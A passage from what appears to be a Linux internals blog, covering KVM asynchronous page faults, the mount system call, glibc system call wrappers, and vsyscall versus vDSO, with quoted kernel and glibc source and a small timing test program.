If the kvm can do apf, it calls ‘kvm_setup_async_pf’(called by ‘kvm_arch_setup_async_pf’) to setup a ‘work queue’ and calls ‘kvm_arch_async_page_not_present’ to notify the guest. As this commit just setups the apf framework, the ‘kvm_arch_async_page_not_present’ doesn’t inject interrupt.

‘kvm_setup_async_pf’ initializes a ‘work_struct’ and its function is ‘async_pf_execute’. ‘async_pf_execute’ swaps in the fault page.

Then in the ‘__vcpu_run’ when the guest VMEXIT, it calls ‘kvm_check_async_pf_completion’ to check whether the apf work is done. This is the first version of apf, called ‘batch mechanism’. Commit KVM: async_pf: Provide additional direct page notification add a Config ‘KVM_ASYNC_PF_SYNC’. When this selected, the ‘kvm’ will notify the guest directly.

commit: KVM: Inject asynchronous page fault into a PV guest if page is swapped out is easy to understand.

Following is the core, when the page not present, the kvm can halt the vcpu or inject ‘KVM_PV_REASON_PAGE_NOT_PRESENT’ to guest. When the async page is ready, the kvm inject ‘KVM_ASYNC_PF_ENABLED’ to guest.

    void kvm_arch_async_page_not_present(struct kvm_vcpu *vcpu,
                        struct kvm_async_pf *work)
    {
    -	trace_kvm_async_pf_not_present(work->gva);
    -
    -	kvm_make_request(KVM_REQ_APF_HALT, vcpu);
    +	trace_kvm_async_pf_not_present(work->arch.token, work->gva);
        kvm_add_async_pf_gfn(vcpu, work->arch.gfn);
    +
    +	if (!(vcpu->arch.apf.msr_val & KVM_ASYNC_PF_ENABLED) ||
    +	    kvm_x86_ops->get_cpl(vcpu) == 0)
    +		kvm_make_request(KVM_REQ_APF_HALT, vcpu);
    +	else if (!apf_put_user(vcpu, KVM_PV_REASON_PAGE_NOT_PRESENT)) {
    +		vcpu->arch.fault.error_code = 0;
    +		vcpu->arch.fault.address = work->arch.token;
    +		kvm_inject_page_fault(vcpu);
    +	}
    }
    
    void kvm_arch_async_page_present(struct kvm_vcpu *vcpu,
                    struct kvm_async_pf *work)
    {
    -	trace_kvm_async_pf_ready(work->gva);
    -	kvm_del_async_pf_gfn(vcpu, work->arch.gfn);
    +	trace_kvm_async_pf_ready(work->arch.token, work->gva);
    +	if (is_error_page(work->page))
    +		work->arch.token = ~0; /* broadcast wakeup */
    +	else
    +		kvm_del_async_pf_gfn(vcpu, work->arch.gfn);
    +
    +	if ((vcpu->arch.apf.msr_val & KVM_ASYNC_PF_ENABLED) &&
    +	    !apf_put_user(vcpu, KVM_PV_REASON_PAGE_READY)) {
    +		vcpu->arch.fault.error_code = 0;
    +		vcpu->arch.fault.address = work->arch.token;
    +		kvm_inject_page_fault(vcpu);
    +	}
    +}

Reference

[1] Asynchronous page faults

[2] 从kvm场景下guest访问的内存被swap出去之后说起

system call analysis: mount

2019-02-23T00:00:00+00:00

The data in disk is just raw bytes, the user need to access these data as file, so there shoud be a layer to abstract this. This is what file system does.

Linux supports a lot of file systems. There are kinds of file systems, for eaxmple ext2/3/4, xfs is for local storage, proc and sys are pseudo file systems and nfs is network file system.

Whenever we want to use a new storage, we need first make file system on it and then mount it in OS. After that, the user can access the data in the new storage.

This post is the onte for mount system call. Following is the definition of mount system call:

    #include <sys/mount.h>

    int mount(const char *source, const char *target,
            const char *filesystemtype, unsigned long mountflags,
            const void *data);

The first argument ‘source’ often specifies a storage device’s pathname. The second argument ‘target’ sepcifies the location the ‘source’ will be attached. The ‘filesystemtype’ specifies file system name such as ‘ext4’, ‘xfs’, ‘iso9660’ and so on. The final argument ‘data’ is interpreted by different filesystems.

mount syscall is defined in fs/namespace.c.

    SYSCALL_DEFINE5(mount, char __user *, dev_name, char __user *, dir_name,
            char __user *, type, unsigned long, flags, void __user *, data)
    {
        int ret;
        char *kernel_type;
        char *kernel_dev;
        unsigned long data_page;

        kernel_type = copy_mount_string(type);
        ret = PTR_ERR(kernel_type);
        if (IS_ERR(kernel_type))
            goto out_type;

        kernel_dev = copy_mount_string(dev_name);
        ret = PTR_ERR(kernel_dev);
        if (IS_ERR(kernel_dev))
            goto out_dev;

        ret = copy_mount_options(data, &data_page);
        if (ret < 0)
            goto out_data;

        ret = do_mount(kernel_dev, dir_name, kernel_type, flags,
            (void *) data_page);

        free_page(data_page);
    out_data:
        kfree(kernel_dev);
    out_dev:
        kfree(kernel_type);
    out_type:
        return ret;
    }

Copy the userspace argument to kernel and then transfer the control to ‘do_mount’.

‘do_mount’ first get the ‘path’ struct of userspace specified directory path. struct ‘path’ contains ‘vfsmount’ and ‘dentry’ and is used to present a directory patch’s dentry. Then ‘do_mount’ according to ‘flags’ value and call corresponding function, such as ‘do_remount’, ‘do_lookback’, ‘do_change_type’ and so on. The default call is ‘do_new_mount’. This add a new mount to a directory.

    static int do_new_mount(struct path *path, const char *fstype, int flags,
                int mnt_flags, const char *name, void *data)
    {
        struct file_system_type *type;
        struct user_namespace *user_ns = current->nsproxy->mnt_ns->user_ns;
        struct vfsmount *mnt;
        int err;

        if (!fstype)
            return -EINVAL;

        type = get_fs_type(fstype);
        if (!type)
            return -ENODEV;

        if (user_ns != &init_user_ns) {
            if (!(type->fs_flags & FS_USERNS_MOUNT)) {
                put_filesystem(type);
                return -EPERM;
            }
            /* Only in special cases allow devices from mounts
            * created outside the initial user namespace.
            */
            if (!(type->fs_flags & FS_USERNS_DEV_MOUNT)) {
                flags |= MS_NODEV;
                mnt_flags |= MNT_NODEV | MNT_LOCK_NODEV;
            }
            if (type->fs_flags & FS_USERNS_VISIBLE) {
                if (!fs_fully_visible(type, &mnt_flags)) {
                    put_filesystem(type);
                    return -EPERM;
                }
            }
        }

        mnt = vfs_kern_mount(type, flags, name, data);
        if (!IS_ERR(mnt) && (type->fs_flags & FS_HAS_SUBTYPE) &&
            !mnt->mnt_sb->s_subtype)
            mnt = fs_set_subtype(mnt, fstype);

        put_filesystem(type);
        if (IS_ERR(mnt))
            return PTR_ERR(mnt);

        err = do_add_mount(real_mount(mnt), path, mnt_flags);
        if (err)
            mntput(mnt);
        return err;
    }

The mainly function called by ‘do_new_mount’ is ‘vfs_kern_mount’ and ‘do_add_mount’. ‘do_new_mount’ create and initialize a new ‘mount’ to represent this new mount.

    struct vfsmount *
    vfs_kern_mount(struct file_system_type *type, int flags, const char *name, void *data)
    {
        struct mount *mnt;
        struct dentry *root;

        if (!type)
            return ERR_PTR(-ENODEV);

        mnt = alloc_vfsmnt(name);
        if (!mnt)
            return ERR_PTR(-ENOMEM);

        if (flags & MS_KERNMOUNT)
            mnt->mnt.mnt_flags = MNT_INTERNAL;

        root = mount_fs(type, flags, name, data);
        if (IS_ERR(root)) {
            mnt_free_id(mnt);
            free_vfsmnt(mnt);
            return ERR_CAST(root);
        }

        mnt->mnt.mnt_root = root;
        mnt->mnt.mnt_sb = root->d_sb;
        mnt->mnt_mountpoint = mnt->mnt.mnt_root;
        mnt->mnt_parent = mnt;
        lock_mount_hash();
        list_add_tail(&mnt->mnt_instance, &root->d_sb->s_mounts);
        unlock_mount_hash();
        return &mnt->mnt;
    }

It then calls ‘mount_fs’, in this function it calls the system type registered ‘mount’ callback. The ‘mount’ callback read the device’s super_block and return the ‘dentry’ of the ‘super_block’. Then it initializes the struct ‘mount’.

After ‘vfs_kernel_mount’ finishes it calls ‘do_new_mount’, this function adds this new mount to the system.

    static int do_add_mount(struct mount *newmnt, struct path *path, int mnt_flags)
    {
        struct mountpoint *mp;
        struct mount *parent;
        int err;

        mnt_flags &= ~MNT_INTERNAL_FLAGS;

        mp = lock_mount(path);
        if (IS_ERR(mp))
            return PTR_ERR(mp);

        parent = real_mount(path->mnt);
        err = -EINVAL;
        if (unlikely(!check_mnt(parent))) {
            /* that's acceptable only for automounts done in private ns */
            if (!(mnt_flags & MNT_SHRINKABLE))
                goto unlock;
            /* ... and for those we'd better have mountpoint still alive */
            if (!parent->mnt_ns)
                goto unlock;
        }

        /* Refuse the same filesystem on the same mount point */
        err = -EBUSY;
        if (path->mnt->mnt_sb == newmnt->mnt.mnt_sb &&
            path->mnt->mnt_root == path->dentry)
            goto unlock;

        err = -EINVAL;
        if (d_is_symlink(newmnt->mnt.mnt_root))
            goto unlock;

        newmnt->mnt.mnt_flags = mnt_flags;
        err = graft_tree(newmnt, parent, mp);

    unlock:
        unlock_mount(mp);
        return err;
    }

Notice here the ‘newmount’ is the new created mount represents the new deivce. And the ‘path’ is the directory that the device will be attached. This function does some check (for example, the same file system can’t be attached to the directory twice) and then calls ‘graft_tree’. ‘graft_tree’ calls ‘attach_recursive_mnt’ to add this new mount to system.

The most important is to set the relation of the new vfsmount and the parent vfsmount.

	mnt_set_mountpoint(dest_mnt, dest_mp, source_mnt);
	commit_tree(source_mnt);

glibc system call wrapper

2019-02-17T00:00:00+00:00

Introduction

glic uses two method to make a wrapper for system calls: one is uses the make-system.sh script to wrap and the other is uses a function and some MACROS to wrap.

After we configure and make glibc source code we can find there is a ‘sysd-syscalls’ file in ‘~/glibc-2.27/build’ directory. In the file, we can see if one system call is generated by script, it has following shape:

    #### CALL=dup NUMBER=32 ARGS=i:i SOURCE=-
    ifeq (,$(filter dup,$(unix-syscalls)))
    unix-syscalls += dup
    $(foreach p,$(sysd-rules-targets),$(foreach o,$(object-suffixes),$(objpfx)$(patsubst %,$p,dup)$o)): \
                    $(..)sysdeps/unix/make-syscalls.sh
            $(make-target-directory)
            (echo '#define SYSCALL_NAME dup'; \
            echo '#define SYSCALL_NARGS 1'; \
            echo '#define SYSCALL_SYMBOL __dup'; \
            echo '#define SYSCALL_NOERRNO 0'; \
            echo '#define SYSCALL_ERRVAL 0'; \
            echo '#include <syscall-template.S>'; \
            echo 'weak_alias (__dup, dup)'; \
            echo 'hidden_weak (dup)'; \
            ) | $(compile-syscall) $(foreach p,$(patsubst %dup,%,$(basename $(@F))),$($(p)CPPFLAGS))
    endif

If one system call is generated by c file, it has following shape:

    #### CALL=open NUMBER=2 ARGS=Ci:siv SOURCE=sysdeps/unix/sysv/linux/open.c

    #### CALL=profil NUMBER=- ARGS=i:piii SOURCE=sysdeps/unix/sysv/linux/profil.c

    #### CALL=ptrace NUMBER=101 ARGS=i:iiii SOURCE=sysdeps/unix/sysv/linux/ptrace.c

    #### CALL=read NUMBER=0 ARGS=Ci:ibn SOURCE=sysdeps/unix/sysv/linux/read.c

Script wrapper

There are three kind of files related with script wrapper: One ‘make-syscall.sh’ file, one ‘syscall-template.S’ file, and some ‘syscalls.list’ files.

The ‘glibc-2.27/sysdeps/unix/make-syscall.sh’ is a script, it reads ‘syscalls.list’ file and parses every line to generate a wrapper for system call.

The ‘syscalls.list’ has following shape:

    # File name	Caller	Syscall name	Args	Strong name	Weak names

    accept		-	accept		Ci:iBN	__libc_accept	accept
    access		-	access		i:si	__access	access
    acct		-	acct		i:S	acct
    adjtime		-	adjtime		i:pp	__adjtime	adjtime
    bind		-	bind		i:ipi	__bind		bind
    chdir		-	chdir		i:s	__chdir		chdir
    chmod		-	chmod		i:si	__chmod		chmod

This file specify the system call’s name argument, etc.

There are several syscalls.list file:

    sysdeps/unix/syscalls.list
    sysdeps/unix/sysv/linux/syscalls.list
    sysdeps/unix/sysv/linux/generic/syscalls.list
    sysdeps/unix/sysv/linux/x86_64/syscalls.list

‘syscall-template.S’ is a template file used in every script wrapper system call.

    #include <sysdep.h>

    /* This indirection is needed so that SYMBOL gets macro-expanded.  */
    #define syscall_hidden_def(SYMBOL)		hidden_def (SYMBOL)

    #define T_PSEUDO(SYMBOL, NAME, N)		PSEUDO (SYMBOL, NAME, N)
    #define T_PSEUDO_NOERRNO(SYMBOL, NAME, N)	PSEUDO_NOERRNO (SYMBOL, NAME, N)
    #define T_PSEUDO_ERRVAL(SYMBOL, NAME, N)	PSEUDO_ERRVAL (SYMBOL, NAME, N)
    #define T_PSEUDO_END(SYMBOL)			PSEUDO_END (SYMBOL)
    #define T_PSEUDO_END_NOERRNO(SYMBOL)		PSEUDO_END_NOERRNO (SYMBOL)
    #define T_PSEUDO_END_ERRVAL(SYMBOL)		PSEUDO_END_ERRVAL (SYMBOL)

    #if SYSCALL_NOERRNO

    /* This kind of system call stub never returns an error.
    We return the return value register to the caller unexamined.  */

    T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
        ret_NOERRNO
    T_PSEUDO_END_NOERRNO (SYSCALL_SYMBOL)

    #elif SYSCALL_ERRVAL

    /* This kind of system call stub returns the errno code as its return
    value, or zero for success.  We may massage the kernel's return value
    to meet that ABI, but we never set errno here.  */

    T_PSEUDO_ERRVAL (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
        ret_ERRVAL
    T_PSEUDO_END_ERRVAL (SYSCALL_SYMBOL)

    #else

    /* This is a "normal" system call stub: if there is an error,
    it returns -1 and sets errno.  */

    T_PSEUDO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
        ret
    T_PSEUDO_END (SYSCALL_SYMBOL)

    #endif

    syscall_hidden_def (SYSCALL_SYMBOL)

There are three kind of system call which is defined by ‘T_PSEUDO’, ‘T_PSEUDO_NOERRNO’ and ‘T_PSEUDO_ERRVAL’. If ‘SYSCALL_NOERRNO’ is defined then the system call is wrapped by ‘T_PSEUDO_NOERRNO’, this means the wrapper doesn’t return error code, for example the ‘getpid’ and ‘umask’ system call. If ‘SYSCALL_ERRVAL’ is defined then the system call is wrapped by ‘T_PSEUDO_ERRVAL’, this means the wrapper return the kernel error code directly. If neither ‘SYSCALL_NOERRNO’ nor ‘SYSCALL_ERRVAL’ are defined then the system call is wrapped by ‘T_PSEUDO’, this means the wrapper will return -1 on errors and copy the return value(error) to errno varaible.

‘T_PSEUDO’, ‘T_PSEUDO_NOERRNO’ and ‘T_PSEUDO_ERRVAL’ are in ‘sysdep.h’, which in ‘glibc-2.27/sysdeps/unix/sysv/linux/x86_64/sysdep.h’.

First of let’s see ‘PSEUDO_NOERRNO’:

    # undef	PSEUDO_NOERRNO
    # define PSEUDO_NOERRNO(name, syscall_name, args) \
    .text;								      \
    ENTRY (name)								      \
        DO_CALL (syscall_name, args)

    # undef	PSEUDO_END_NOERRNO
    # define PSEUDO_END_NOERRNO(name) \
    END (name)

Following is definition of ‘DO_CALL’:

    # undef	DO_CALL
    # define DO_CALL(syscall_name, args)		\
        DOARGS_##args				\
        movl $SYS_ify (syscall_name), %eax;		\
        syscall;

‘DO_ARGS_##args’ extends the arguments of system call. The kernel uses the following parameters:

    syscall number	rax
    arg 1		rdi
    arg 2		rsi
    arg 3		rdx
    arg 4		r10
    arg 5		r8
    arg 6		r9

However normal function call in userspace including calls to system call stub how the following parameters:

    system call number	in the DO_CALL macro
    arg 1		rdi
    arg 2		rsi
    arg 3		rdx
    arg 4		rcx
    arg 5		r8
    arg 6		r9

So the DOARGS_x has following definition:

    # define DOARGS_0 /* nothing */
    # define DOARGS_1 /* nothing */
    # define DOARGS_2 /* nothing */
    # define DOARGS_3 /* nothing */
    # define DOARGS_4 movq %rcx, %r10;
    # define DOARGS_5 DOARGS_4
    # define DOARGS_6 DOARGS_5

This means only when the system call has >=4 arguments it need to move %rcx argument to %r10.

The ‘SYS_ify’ is defined as fowllowing:

    #undef SYS_ify
    #define SYS_ify(syscall_name)	__NR_##syscall_name

So the ‘DO_CALL’ MACRO makes the system call’s arguments and moves system call number to %eax and executes ‘syscall’ instruction.

The ‘ENTRY’ and ‘END’ of ‘PSEUDO_NOERRNO’ MACRO is following:

    /* Define an entry point visible from C.  */
    #define	ENTRY(name)							      \
    .globl C_SYMBOL_NAME(name);						      \
    .type C_SYMBOL_NAME(name),@function;					      \
    .align ALIGNARG(4);							      \
    C_LABEL(name)								      \
    cfi_startproc;							      \
    CALL_MCOUNT

    #undef	END
    #define END(name)							      \
    cfi_endproc;								      \
    ASM_SIZE_DIRECTIVE(name)

No speical just some standard definition.

So for ‘PSEUDO_NOERRNO’, this means the system doesn’t return error, so glibc doesn’t need to do anything for the return value.

For ‘PSEUDO_ERRVAL’, it just return the negtive number of error.

    # undef	PSEUDO_ERRVAL
    # define PSEUDO_ERRVAL(name, syscall_name, args) \
    .text;								      \
    ENTRY (name)								      \
        DO_CALL (syscall_name, args);					      \
        negq %rax

    # undef	PSEUDO_END_ERRVAL
    # define PSEUDO_END_ERRVAL(name) \
    END (name)

For ‘PSEUDO’, it checks the return value with -4095, if the return value >= -4095(0xfffffffffffff001), this means the system call in kernel returns an error. glibc to ‘SYSCALL_ERROR_LABEL’ to handle this.

    # undef	PSEUDO
    # define PSEUDO(name, syscall_name, args)				      \
    .text;								      \
    ENTRY (name)								      \
        DO_CALL (syscall_name, args);					      \
        cmpq $-4095, %rax;							      \
        jae SYSCALL_ERROR_LABEL

    # undef	PSEUDO_END
    # define PSEUDO_END(name)						      \
    SYSCALL_ERROR_HANDLER							      \
    END (name)

‘SYSCALL_ERROR_LABEL’ is defined as following:

    # ifdef PIC
    #  define SYSCALL_ERROR_LABEL 0f
    # else
    #  define SYSCALL_ERROR_LABEL syscall_error
    # endif

For no PIC defined:

    #define	syscall_error	__syscall_error
    int
    __attribute__ ((__regparm__ (1)))
    __syscall_error (int error)
    {
    __set_errno (-error);
    return -1;
    }

So for ‘PSEUDO’, the glibc set the errno with the kernel return error adn return -1 for the wrapper function.

Following is an example of dup system call wrapper.

    00000000000e4ea0 <dup>:
    e4ea0:       b8 20 00 00 00          mov    $0x20,%eax
    e4ea5:       0f 05                   syscall
    e4ea7:       48 3d 01 f0 ff ff       cmp    $0xfffffffffffff001,%rax
    e4ead:       73 01                   jae    e4eb0 <dup+0x10>
    e4eaf:       c3                      retq
    e4eb0:       48 8b 0d b1 8f 2c 00    mov    0x2c8fb1(%rip),%rcx        # 3ade68 <.got+0x108>
    e4eb7:       f7 d8                   neg    %eax
    e4eb9:       64 89 01                mov    %eax,%fs:(%rcx)
    e4ebc:       48 83 c8 ff             or     $0xffffffffffffffff,%rax
    e4ec0:       c3                      retq
    e4ec1:       66 2e 0f 1f 84 00 00    nopw   %cs:0x0(%rax,%rax,1)
    e4ec8:       00 00 00
    e4ecb:       0f 1f 44 00 00          nopl   0x0(%rax,%rax,1)

C file wrapper

As I have said, there are another C file wrapper, it defines system call wrapper in a C file. For example ‘sysd-syscalls’ has following line:

    #### CALL=read NUMBER=0 ARGS=Ci:ibn SOURCE=sysdeps/unix/sysv/linux/read.c

Both ‘__libc_read’ and ‘__read_nocancel’ will call:

    INLINE_SYSCALL_CALL (read, fd, buf, nbytes);

    #define INLINE_SYSCALL_CALL(...) \
    __INLINE_SYSCALL_DISP (__INLINE_SYSCALL, __VA_ARGS__)

So ‘INLINE_SYSCALL_CALL’ will extend to:

    __INLINE_SYSCALL_DISP (__INLINE_SYSCALL, read, fd, buf, nbytes)

    #define __INLINE_SYSCALL_DISP(b,...) \
    __SYSCALL_CONCAT (b,__INLINE_SYSCALL_NARGS(__VA_ARGS__))(__VA_ARGS__)

MACRO __INLINE_SYSCALL_NARGS(read, fd, buf, nbytes) extend to:

    __INLINE_SYSCALL_NARGS_X (read, fd, buf, nbytes,7,6,5,4,3,2,1,0,)

This will finally generate to 3.

So ‘ __INLINE_SYSCALL_DISP (__INLINE_SYSCALL, read, fd, buf, nbytes)’ is extended to:

    __INLINE_SYSCALL3(read, fd, buf, nbytes)

As:

    #define __INLINE_SYSCALL3(name, a1, a2, a3) \
    INLINE_SYSCALL (name, 3, a1, a2, a3)

extended to:

    INLINE_SYSCALL(read, 3, fd, buf, nbytes)

This MACRO is defined as following:

    # undef INLINE_SYSCALL
    # define INLINE_SYSCALL(name, nr, args...) \
    ({									      \
        unsigned long int resultvar = INTERNAL_SYSCALL (name, , nr, args);	      \
        if (__glibc_unlikely (INTERNAL_SYSCALL_ERROR_P (resultvar, )))	      \
        {									      \
        __set_errno (INTERNAL_SYSCALL_ERRNO (resultvar, ));		      \
        resultvar = (unsigned long int) -1;				      \
        }									      \
        (long int) resultvar; })

Here go to the ‘INTERNAL_SYSCALL’ MACRO:

    #undef INTERNAL_SYSCALL
    #define INTERNAL_SYSCALL(name, err, nr, args...)			\
        internal_syscall##nr (SYS_ify (name), err, args)

For ‘internal_syscall3’:

    #undef internal_syscall3
    #define internal_syscall3(number, err, arg1, arg2, arg3)		\
    ({									\
        unsigned long int resultvar;					\
        TYPEFY (arg3, __arg3) = ARGIFY (arg3);			 	\
        TYPEFY (arg2, __arg2) = ARGIFY (arg2);			 	\
        TYPEFY (arg1, __arg1) = ARGIFY (arg1);			 	\
        register TYPEFY (arg3, _a3) asm ("rdx") = __arg3;			\
        register TYPEFY (arg2, _a2) asm ("rsi") = __arg2;			\
        register TYPEFY (arg1, _a1) asm ("rdi") = __arg1;			\
        asm volatile (							\
        "syscall\n\t"							\
        : "=a" (resultvar)							\
        : "0" (number), "r" (_a1), "r" (_a2), "r" (_a3)			\
        : "memory", REGISTERS_CLOBBERED_BY_SYSCALL);			\
        (long int) resultvar;						\
    })

So this function finally makes the three arguments and trigger syscall and return ‘resultvar’.

Go to ‘INLINE_SYSCALL’ MACRO:

If ‘resultvar’ is an error, glibc assign this -resultvar to errno and return -1 as the wrapper’s return value.

vsyscall and vDSO

2019-02-13T00:00:00+00:00

Introduction

Though there is a very good article to introduce vsyscalls and vDSO. I still write this to strengthen my understanding.

The application in user space triggers system call to kernel to do some privileged work. It is an expensive operation containing trapping to kernel and returning. If the application triggers a system call very often, there will be remarkable performance influence. The vsyscall and vDSO are designed to speed up some certain easy system calls.

vsyscalls

virtual system call(vsyscall) is the first mechanism in Linux kernel to try to accelerate the execution of some certain system calls. The idea behind vsyscall is simple. Some system call just return data to user space. If the kernel maps these system call implementation and the related-data into user space pages. Then the application can just trigger these system call like a trivial function call. There will be no context switch between user space and kernel space. We can found this vsyscall pages in kernel documentation.

    ffffffffff600000 - ffffffffffdfffff (=8 MB) vsyscalls

We can see this in process:

    test@ubuntu:~$ cat /proc/self/maps | grep vsyscall
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
    test@ubuntu:~$ 

As we can see, this address is fixed in every process. Th fixed address is considered to violate the ASLR as this allow the attack to write exploit more easy. So the original vsyscall is discarded. But some very old program need this vsyscall page. In order to make them happy, the kernel doesn’t get rid of vsyscall page instead implement a mechanism called emulated vsyscall. We will talk about this vsyscall.

Mapping vsyscall page occurs in Linux kernel initialization. In the call chain start_kernel->setup_arch->map_vsyscall, the last call is to setup vsyscall page. The code of map_vsyscall shows below:

    void __init map_vsyscall(void)
    {
        extern char __vsyscall_page;
        unsigned long physaddr_vsyscall = __pa_symbol(&__vsyscall_page);

        if (vsyscall_mode != NATIVE)
            vsyscall_pgprot = __PAGE_KERNEL_VVAR;
        if (vsyscall_mode != NONE)
            __set_fixmap(VSYSCALL_PAGE, physaddr_vsyscall,
                    __pgprot(vsyscall_pgprot));

        BUILD_BUG_ON((unsigned long)__fix_to_virt(VSYSCALL_PAGE) !=
                (unsigned long)VSYSCALL_ADDR);
    }

First get the physical address of the vsyscall page. It is __vsyscall_page and the contents of this page is below:

    __vsyscall_page:

        mov $__NR_gettimeofday, %rax
        syscall
        ret

        .balign 1024, 0xcc
        mov $__NR_time, %rax
        syscall
        ret

        .balign 1024, 0xcc
        mov $__NR_getcpu, %rax
        syscall
        ret

        .balign 4096, 0xcc

        .size __vsyscall_page, 4096

The vsyscall contains three system call, gettimeofday, time and getcpu.

After we get the physical address of the ‘__vsyscall_page’, we check vsyscall_mode and set the fix-mapped address for vsyscall page with the __set_fixmap macro. If the ‘vsyscall_mode’ is not native, we set ‘vsyscall_pgprot’ to ‘__PAGE_KERNEL_VVAR’, this means the user space can only read this page. If it is native, it can execute. Note both of the two prot allow the user space to access this page.

    #define __PAGE_KERNEL_VSYSCALL		(__PAGE_KERNEL_RX | _PAGE_USER)
    #define __PAGE_KERNEL_VVAR		(__PAGE_KERNEL_RO | _PAGE_USER)

Here we don’t dig into the ‘__set_fixmap’ function and just know that it sets mapping in the vsyscall page virtual address to physical address.

Finally check that virtual address of the vsyscall page is equal to the value of the ‘VSYSCALL_ADDR’.

Now the start address of the vsyscall page is the ffffffffff600000. glibc or application can call the three system call just in vsyscall page.

    #define VSYSCALL_ADDR_vgettimeofday   0xffffffffff600000
    #define VSYSCALL_ADDR_vtime           0xffffffffff600400
    #define VSYSCALL_ADDR_vgetcpu          0xffffffffff600800

In emulate mode, the access of vsyscall page will trigger page fault and ‘emulate_vsyscall’ will be called. This function get the syscall number from address:

	vsyscall_nr = addr_to_vsyscall_nr(address);

    static int addr_to_vsyscall_nr(unsigned long addr)
    {
        int nr;

        if ((addr & ~0xC00UL) != VSYSCALL_ADDR)
            return -EINVAL;

        nr = (addr & 0xC00UL) >> 10;
        if (nr >= 3)
            return -EINVAL;

        return nr;
    }

Here we can see only the three address is valid. This is also helpful to mitigate the ROP chain using this vsyscall page.

After the check, it calls the system call function.

    switch (vsyscall_nr) {
    case 0:
        ret = sys_gettimeofday(
            (struct timeval __user *)regs->di,
            (struct timezone __user *)regs->si);
        break;

    case 1:
        ret = sys_time((time_t __user *)regs->di);
        break;

    case 2:
        ret = sys_getcpu((unsigned __user *)regs->di,
                (unsigned __user *)regs->si,
                NULL);
        break;
    }

So as we can see here, the performance of this emulated vsyscall is even more than just do system call directly.

vDSO

As I have said, the vsyscall is discarded and replaced by virtual dynamic shared object(vDSO). The difference between the vsyscall and vDSO is that vDSO maps memory pages into each process as a shared object, but vsyscall is static in memory and has the same address every time in every process. All userspace application that dynamically link to glibc will use vDSO automatically. For example:

    root@ubuntu:~# ldd /bin/ls
        linux-vdso.so.1 (0x00007ffed38da000)
        libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007fab27f0a000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fab27b19000)
        libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3
        ...

We can see every time the vdso has a differenct load address.

    root@ubuntu:~# cat /proc/self/maps | grep vdso
    7ffd2307f000-7ffd23081000 r-xp 00000000 00:00 0                          [vdso]
    root@ubuntu:~# cat /proc/self/maps | grep vdso
    7ffce17c7000-7ffce17c9000 r-xp 00000000 00:00 0                          [vdso]
    root@ubuntu:~# cat /proc/self/maps | grep vdso
    7ffe581ca000-7ffe581cc000 r-xp 00000000 00:00 0                          [vdso]
    root@ubuntu:~# 

vdso is initialized in ‘init_vdso’ function.

    static int __init init_vdso(void)
    {
        init_vdso_image(&vdso_image_64);

    #ifdef CONFIG_X86_X32_ABI
        init_vdso_image(&vdso_image_x32);
    #endif

‘vdso_image_64/x32’ is in a generated source file arch/x86/entry/vdso/vdso-image-64.c. These source code files generated by the vdso2c program from the different source code files, represent different approaches to call a system call like int 0x80, sysenter and etc. The full set of the images depends on the kernel configuration.

For example for the x86_64 Linux kernel it will contain vdso_image_64:

    const struct vdso_image vdso_image_64 = {
        .data = raw_data,
        .size = 8192,
        .text_mapping = {
            .name = "[vdso]",
            .pages = pages,
        },
        .alt = 3673,
        .alt_len = 52,
        .sym_vvar_start = -12288,
        .sym_vvar_page = -12288,
        .sym_hpet_page = -8192,
        .sym_pvclock_page = -4096,
    };

vdso_image contains the data of vDSO image.

Where the raw_data contains raw binary code of the 64-bit vDSO system calls which are 2 page size:

    static struct page *pages[2];

‘init_vdso_image’ initialize some of the ‘vdso_image’.

    void __init init_vdso_image(const struct vdso_image *image)
    {
        int i;
        int npages = (image->size) / PAGE_SIZE;

        BUG_ON(image->size % PAGE_SIZE != 0);
        for (i = 0; i < npages; i++)
            image->text_mapping.pages[i] =
                virt_to_page(image->data + i*PAGE_SIZE);

        apply_alternatives((struct alt_instr *)(image->data + image->alt),
                (struct alt_instr *)(image->data + image->alt +
                            image->alt_len));
    }

When the kernel loads a binary to memory, it calls ‘arch_setup_additional_pages’ and this function calls ‘map_vdso’.

Note the ‘map_vdso’ need also map a vvar region. The vDSO implements four system calls

    __vdso_clock_gettime;
    __vdso_getcpu;
    __vdso_gettimeofday;
    __vdso_time.


    root@ubuntu:~# readelf -s vdso.so

    Symbol table '.dynsym' contains 10 entries:
    Num:    Value          Size Type    Bind   Vis      Ndx Name
        0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
        1: 0000000000000a40   619 FUNC    WEAK   DEFAULT   12 clock_gettime@@LINUX_2.6
        2: 0000000000000cb0   352 FUNC    GLOBAL DEFAULT   12 __vdso_gettimeofday@@LINUX_2.6
        3: 0000000000000cb0   352 FUNC    WEAK   DEFAULT   12 gettimeofday@@LINUX_2.6
        4: 0000000000000e10    21 FUNC    GLOBAL DEFAULT   12 __vdso_time@@LINUX_2.6
        5: 0000000000000e10    21 FUNC    WEAK   DEFAULT   12 time@@LINUX_2.6
        6: 0000000000000a40   619 FUNC    GLOBAL DEFAULT   12 __vdso_clock_gettime@@LINUX_2.6
        7: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  ABS LINUX_2.6
        8: 0000000000000e30    41 FUNC    GLOBAL DEFAULT   12 __vdso_getcpu@@LINUX_2.6
        9: 0000000000000e30    41 FUNC    WEAK   DEFAULT   12 getcpu@@LINUX_2.6

experienment

From above we know that the time consume of three mechanism to trigger system call.

    emulated vsyscall > native syscall > vDSO syscall

I wrote the simple test program to test the time.

    #include <stdio.h>
    #include <stdlib.h>
    #include <time.h>
    #include <sys/syscall.h>

    time_t (*f)(time_t *tloc) = 0xffffffffff600400; 

    int main(int argc, char **argv)
    {
        unsigned long i = 0;
        if(!strcmp(argv[1], "1")) {
            for (i = 0; i < 1000000;++i)
            f(NULL);
        } else if (!strcmp(argv[1], "2")) { 
            for (i = 0; i < 1000000;++i)
            time(NULL);
        } else {
            for (i = 0; i < 1000000; ++i) 
            syscall(SYS_time, NULL);
        }
        return 0;

    }

Following is the result. The result show our conclusion.

    root@ubuntu:~# time ./test1 1

    real	0m0.539s
    user	0m0.195s
    sys	0m0.343s
